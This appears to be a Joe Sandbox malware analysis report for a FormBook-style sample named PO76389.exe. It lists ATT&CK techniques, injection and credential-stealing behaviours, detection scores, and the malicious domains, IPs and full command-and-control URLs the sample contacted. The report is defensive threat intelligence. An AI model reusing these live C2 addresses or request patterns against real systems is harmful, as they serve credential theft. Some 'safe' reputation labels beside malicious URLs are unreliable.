            Source: Yara matchFile source: 00000007.00000002.4571538439.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2532350499.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2532645690.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4568125135.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2533022520.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4568413195.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4568496807.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4569325211.0000000002580000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_005091DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_005091DC
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_005096E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_005096E2
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            3
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            31
            Obfuscated Files or Information
            NTDS116
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            Software Packing
            LSA Secrets151
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection
            1
            DLL Side-Loading
            Cached Domain Credentials2
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Valid Accounts
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
            Virtualization/Sandbox Evasion
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
            Access Token Manipulation
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
            Process Injection
            Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1511731 Sample: PO76389.exe Startdate: 16/09/2024 Architecture: WINDOWS Score: 100 28 www.siyue.xyz 2->28 30 www.quantumnests.xyz 2->30 32 17 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 3 other signatures 2->50 10 PO76389.exe 3 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 TrBUxuahdhJ.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 TrBUxuahdhJ.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.independent200.org 103.42.108.46, 49721, 49722, 49723 SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU Australia 22->34 36 parcelfly.net 84.32.84.32, 49737, 49738, 49739 NTT-LT-ASLT Lithuania 22->36 38 7 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            PO76389.exe76%ReversingLabsWin32.Trojan.AutoitInject
            PO76389.exe74%VirustotalBrowse
            PO76389.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.personal-loans-jp8.xyz/wwak/?prutfR_P=E3TGpDthwwVtcd6zArHMi0+elvxdJNsp076mRxbq1wlJhRxdRCVM2u01G8le2+tM+4jqrTcu85UNoN7iByxUa15ZbVJvSSR5vxb+VJw93FLmyr7mIfPMGWfmtP/A6wTj3w==&u8b=M0MH_xux60%Avira URL Cloudsafe
            http://www.independent200.org/yl6y/?u8b=M0MH_xux6&prutfR_P=QPKrZbNCTa4h9OiWdSr2LPtYKpnFP+xQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+FSdSIKD6JgMVQEI+NVmTQ69s3vAAdvPATGhITAPXZUXQ6A==0%Avira URL Cloudsafe
            http://www.mediaplug.biz/osde/0%Avira URL Cloudsafe
            https://www.masteriocp.online/p5rq/?prutfR_P=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR0%Avira URL Cloudsafe
            http://www.personal-loans-jp8.xyz/wwak/0%Avira URL Cloudsafe
            http://www.fimgroup.net:80/f3w9/?prutfR_P=Dh4Gi90%Avira URL Cloudsafe
            http://www.shipincheshi.skin/0vb3/?prutfR_P=xUzASW4UVirhqEepkKH7G1hhCXRgKJ+LG3aq8idvTSxDBC+AgnYLMr8gyh0BIXno1CEegJvcgs9HgFk4HlC4XGXQkMAamkZroN1kMIfewJ5xcpTkuE3fYdnwX+QQCm9qWw==&u8b=M0MH_xux60%Avira URL Cloudsafe
            http://www.independent200.org/yl6y/0%Avira URL Cloudsafe
            http://www.quantumnests.xyz/vnd3/0%Avira URL Cloudsafe
            http://www.parcelfly.net/n59g/0%Avira URL Cloudsafe
            http://www.mediaplug.biz/osde/?prutfR_P=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sPWqJU3bviStab5pw4zunthcPnIDJoH7elLKb+pwDrPWt7Q==&u8b=M0MH_xux60%Avira URL Cloudsafe
            http://www.tigre777gg.online/06rp/0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            http://www.shipincheshi.skin/0vb3/0%Avira URL Cloudsafe
            http://www.quantumnests.xyz/vnd3/?prutfR_P=xYBn5zztkuVfiCwoRQOy2opDl7RgoPyR03XK+4rS3g0RcyLb68RvZiy9qVH4+ViXNRgW3ur8wHahmEpIZ6ERRmF7/bt0PBBiFKuaDRgyJqJJ+MxR9VKTQpRM54mqQi17vQ==&u8b=M0MH_xux60%Avira URL Cloudsafe
            http://www.thinkphp.cn0%Avira URL Cloudsafe
            http://www.masteriocp.online/p5rq/0%Avira URL Cloudsafe
            http://www.fimgroup.net/f3w9/0%Avira URL Cloudsafe
            http://www.chamadaslotgiris.net/gqyt/?prutfR_P=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&u8b=M0MH_xux60%Avira URL Cloudsafe
            http://www.parcelfly.net/n59g/?prutfR_P=5pnE2UHiCW8ObGXSgpx/iGO8gW0d7AEBtxaudhAi15+uyfG3JVq1h0FDH1nQvWuKz1Kon5CV4Z0icGbf56g2ha7dmOKO9m7V5QX/Ut0iNssFIOAJa+JBBsuFpAHajyYobg==&u8b=M0MH_xux60%Avira URL Cloudsafe
            http://www.fimgroup.net0%Avira URL Cloudsafe
            http://www.fimgroup.net/f3w9/?prutfR_P=Dh4Gi9+74bFgt7GfY7nAkA9WO4K4BtRildy9F7aGfftu7RHBnk3NlrVThFQn4aec5hsiNdt2NoWcO3TRD6+a1p9HDTSMRDAgwWxIW4AdBTiWqaWdzxLVl6hXjmw9P5qUhA==&u8b=M0MH_xux60%Avira URL Cloudsafe
            http://www.masteriocp.online/p5rq/?prutfR_P=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5BxIUOARFC/F7kb9hzkdtOwUlduKX5dZAlA2NzH1X/KLd6Q==&u8b=M0MH_xux60%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            fimgroup.net
            62.149.128.40
            truetrue
              unknown
              www.independent200.org
              103.42.108.46
              truetrue
                unknown
                chamadaslotgiris.net
                3.33.130.190
                truetrue
                  unknown
                  dns.ladipage.com
                  13.228.81.39
                  truetrue
                    unknown
                    www.personal-loans-jp8.xyz
                    199.59.243.226
                    truetrue
                      unknown
                      www.quantumnests.xyz
                      162.0.239.141
                      truetrue
                        unknown
                        www.shipincheshi.skin
                        154.23.176.197
                        truetrue
                          unknown
                          tigre777gg.online
                          3.33.130.190
                          truetrue
                            unknown
                            www.mediaplug.biz
                            66.81.203.200
                            truetrue
                              unknown
                              parcelfly.net
                              84.32.84.32
                              truetrue
                                unknown
                                www.parcelfly.net
                                unknown
                                unknowntrue
                                  unknown
                                  www.monos.shop
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.masteriocp.online
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.chamadaslotgiris.net
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.fimgroup.net
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.siyue.xyz
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.linkbasic.net
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.abbabyfernando.online
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.tigre777gg.online
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.independent200.org/yl6y/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.mediaplug.biz/osde/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.personal-loans-jp8.xyz/wwak/?prutfR_P=E3TGpDthwwVtcd6zArHMi0+elvxdJNsp076mRxbq1wlJhRxdRCVM2u01G8le2+tM+4jqrTcu85UNoN7iByxUa15ZbVJvSSR5vxb+VJw93FLmyr7mIfPMGWfmtP/A6wTj3w==&u8b=M0MH_xux6true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.parcelfly.net/n59g/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.quantumnests.xyz/vnd3/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.personal-loans-jp8.xyz/wwak/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.independent200.org/yl6y/?u8b=M0MH_xux6&prutfR_P=QPKrZbNCTa4h9OiWdSr2LPtYKpnFP+xQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+FSdSIKD6JgMVQEI+NVmTQ69s3vAAdvPATGhITAPXZUXQ6A==true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.shipincheshi.skin/0vb3/?prutfR_P=xUzASW4UVirhqEepkKH7G1hhCXRgKJ+LG3aq8idvTSxDBC+AgnYLMr8gyh0BIXno1CEegJvcgs9HgFk4HlC4XGXQkMAamkZroN1kMIfewJ5xcpTkuE3fYdnwX+QQCm9qWw==&u8b=M0MH_xux6true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.tigre777gg.online/06rp/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.mediaplug.biz/osde/?prutfR_P=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sPWqJU3bviStab5pw4zunthcPnIDJoH7elLKb+pwDrPWt7Q==&u8b=M0MH_xux6true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.shipincheshi.skin/0vb3/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.masteriocp.online/p5rq/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.fimgroup.net/f3w9/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.parcelfly.net/n59g/?prutfR_P=5pnE2UHiCW8ObGXSgpx/iGO8gW0d7AEBtxaudhAi15+uyfG3JVq1h0FDH1nQvWuKz1Kon5CV4Z0icGbf56g2ha7dmOKO9m7V5QX/Ut0iNssFIOAJa+JBBsuFpAHajyYobg==&u8b=M0MH_xux6true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.quantumnests.xyz/vnd3/?prutfR_P=xYBn5zztkuVfiCwoRQOy2opDl7RgoPyR03XK+4rS3g0RcyLb68RvZiy9qVH4+ViXNRgW3ur8wHahmEpIZ6ERRmF7/bt0PBBiFKuaDRgyJqJJ+MxR9VKTQpRM54mqQi17vQ==&u8b=M0MH_xux6true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.chamadaslotgiris.net/gqyt/?prutfR_P=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&u8b=M0MH_xux6true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.masteriocp.online/p5rq/?prutfR_P=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5BxIUOARFC/F7kb9hzkdtOwUlduKX5dZAlA2NzH1X/KLd6Q==&u8b=M0MH_xux6true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.fimgroup.net/f3w9/?prutfR_P=Dh4Gi9+74bFgt7GfY7nAkA9WO4K4BtRildy9F7aGfftu7RHBnk3NlrVThFQn4aec5hsiNdt2NoWcO3TRD6+a1p9HDTSMRDAgwWxIW4AdBTiWqaWdzxLVl6hXjmw9P5qUhA==&u8b=M0MH_xux6true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://duckduckgo.com/ac/?q=netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://www.masteriocp.online/p5rq/?prutfR_P=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zRnetbtugc.exe, 00000005.00000002.4571457721.0000000003C98000.00000004.10000000.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569695157.00000000037D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://www.ecosia.org/newtab/netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fimgroup.net:80/f3w9/?prutfR_P=Dh4Gi9netbtugc.exe, 00000005.00000002.4571457721.0000000004DDE000.00000004.10000000.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569695157.000000000491E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://www.google.comnetbtugc.exe, 00000005.00000002.4571457721.0000000004472000.00000004.10000000.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569695157.0000000003FB2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.thinkphp.cnnetbtugc.exe, 00000005.00000002.4571457721.0000000004C4C000.00000004.10000000.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569695157.000000000478C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fimgroup.netTrBUxuahdhJ.exe, 00000007.00000002.4571538439.0000000005562000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  62.149.128.40
                                                  fimgroup.netItaly
                                                  31034ARUBA-ASNITtrue
                                                  162.0.239.141
                                                  www.quantumnests.xyzCanada
                                                  22612NAMECHEAP-NETUStrue
                                                  199.59.243.226
                                                  www.personal-loans-jp8.xyzUnited States
                                                  395082BODIS-NJUStrue
                                                  84.32.84.32
                                                  parcelfly.netLithuania
                                                  33922NTT-LT-ASLTtrue
                                                  13.228.81.39
                                                  dns.ladipage.comUnited States
                                                  16509AMAZON-02UStrue
                                                  66.81.203.200
                                                  www.mediaplug.bizVirgin Islands (BRITISH)
                                                  40034CONFLUENCE-NETWORK-INCVGtrue
                                                  103.42.108.46
                                                  www.independent200.orgAustralia
                                                  45638SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAUtrue
                                                  3.33.130.190
                                                  chamadaslotgiris.netUnited States
                                                  8987AMAZONEXPANSIONGBtrue
                                                  154.23.176.197
                                                  www.shipincheshi.skinUnited States
                                                  174COGENT-174UStrue
                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                  Analysis ID:1511731
                                                  Start date and time:2024-09-16 09:36:07 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 10m 39s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:7
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:2
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:PO76389.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@7/3@14/9
                                                  EGA Information:
                                                  • Successful, ratio: 75%
                                                  HCA Information:
                                                  • Successful, ratio: 96%
                                                  • Number of executed functions: 53
                                                  • Number of non-executed functions: 300
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target TrBUxuahdhJ.exe, PID 2556 because it is empty
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  TimeTypeDescription
                                                  03:38:23API Interceptor9450343x Sleep call for process: netbtugc.exe modified
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  62.149.128.40bintoday1.exeGet hashmaliciousFormBookBrowse
                                                  • www.fimgroup.net/m3ft/
                                                  Atlas Copco- WEPCO.exeGet hashmaliciousFormBookBrowse
                                                  • www.fimgroup.net/fqzh/
                                                  file No83293 PO & Specification.gz.exeGet hashmaliciousFormBookBrowse
                                                  • www.pyrlist-test.cloud/apau/?32gdi4=omLpuGVmsyOHdGpRdjgRwIdS8onMLPtYZwnQxrZ2pdkklfz3vB2UBDvQaSU1YR7Xr6uYdwMb/adcCe42hD+vmDiudnADMik3xc+FpjXk83bBo7qDRClwT378wlWS9dAj4UFWXQx8lPSh&wLAt=m8MLyLih-H4lf
                                                  64MXEd79F1.exeGet hashmaliciousFormBookBrowse
                                                  • www.autoreediritto.com/aucq/?pZXDmpb8=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&fv=tdYXXJI8Drl4
                                                  09090.exeGet hashmaliciousFormBookBrowse
                                                  • www.autoreediritto.com/aucq/?zFQHE=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&yF3=b0i4Y00xHtf
                                                  8bwKawHg0Z.exeGet hashmaliciousFormBookBrowse
                                                  • www.autoreediritto.com/aucq/?m4kp=Q04lO4tHCdMhGRPp&Z2n4kTEh=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqUenkRjtIRRn+PcJ+980YglFIHv1RxaMTu2bilHhQR8NY0g==
                                                  98790ytt.exeGet hashmaliciousFormBookBrowse
                                                  • www.autoreediritto.com/aucq/?GHo=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&i2=tZJdhrYHabWX4H
                                                  aertrh.exeGet hashmaliciousFormBookBrowse
                                                  • www.autoreediritto.com/aucq/?bbtD=v8Pp0x&mXnt=KoQMLvtx3M4SfAq91ckdEaeNevOygAbB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqWc3KGV5GAX2rZsRT+8QcgDF4B+0ExfJRqG4=
                                                  RB_VAC_1.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                  • www.stnlab.net/twn7/
                                                  Company profile.pif.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • www.insertcoen.com/wu8v/
                                                  162.0.239.141SHIPPING DOC MBL+HBL.exeGet hashmaliciousFormBookBrowse
                                                  • www.quantumnests.xyz/vnd3/
                                                  Purchase order.exeGet hashmaliciousFormBookBrowse
                                                  • www.goulfy.life/ch9d/
                                                  Remittance advice.exeGet hashmaliciousFormBookBrowse
                                                  • www.goulfy.life/ch9d/
                                                  PROFORMA INVOICE BKS-0121-24-25-JP240604.exeGet hashmaliciousFormBookBrowse
                                                  • www.fineg.online/mkan/
                                                  p4LNUqyKZM.exeGet hashmaliciousFormBookBrowse
                                                  • www.fineg.online/mkan/
                                                  PO_987654345678.exeGet hashmaliciousFormBookBrowse
                                                  • www.fineg.online/mkan/?Qd=++BThBYRK05wjkBMoiNZpGp8KzaJeIQtL/1q1tE7a+KA1WWTK8ndyCrnLs1rj5YPQ184ZKAvPKam8uu94QVQnk5qhKksqEgqCLgXJ6uhhZrz9ToUPGPp3h4=&0z=mDcdcR8
                                                  INV20240828.exeGet hashmaliciousFormBookBrowse
                                                  • www.fineg.online/mkan/
                                                  Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                                                  • www.stolex.top/kunq/
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  dns.ladipage.comSHIPPING DOC MBL+HBL.exeGet hashmaliciousFormBookBrowse
                                                  • 18.139.62.226
                                                  r3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                                                  • 13.228.81.39
                                                  SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                                                  • 13.228.81.39
                                                  3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                                                  • 18.139.62.226
                                                  New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                  • 54.179.173.60
                                                  Scan 00093847.exeGet hashmaliciousFormBookBrowse
                                                  • 18.139.62.226
                                                  z11SOAAUG2408.exeGet hashmaliciousFormBookBrowse
                                                  • 13.228.81.39
                                                  REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 13.228.81.39
                                                  DN.exeGet hashmaliciousFormBookBrowse
                                                  • 18.139.62.226
                                                  https://www.newbalancestore.asia/nb530.nh?utm_source=saleGet hashmaliciousUnknownBrowse
                                                  • 13.228.81.39
                                                  www.personal-loans-jp8.xyzSHIPPING DOC MBL+HBL.exeGet hashmaliciousFormBookBrowse
                                                  • 199.59.243.226
                                                  r9856_7.exeGet hashmaliciousFormBookBrowse
                                                  • 199.59.243.226
                                                  Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                                                  • 199.59.243.226
                                                  www.shipincheshi.skinPASU5160894680 DOCS.scr.exeGet hashmaliciousFormBookBrowse
                                                  • 154.23.176.197
                                                  Jsn496Em5T.exeGet hashmaliciousFormBookBrowse
                                                  • 154.23.176.197
                                                  play.exeGet hashmaliciousFormBookBrowse
                                                  • 154.23.176.197
                                                  www.quantumnests.xyzSHIPPING DOC MBL+HBL.exeGet hashmaliciousFormBookBrowse
                                                  • 162.0.239.141
                                                  www.independent200.orgSHIPPING DOC MBL+HBL.exeGet hashmaliciousFormBookBrowse
                                                  • 103.42.108.46
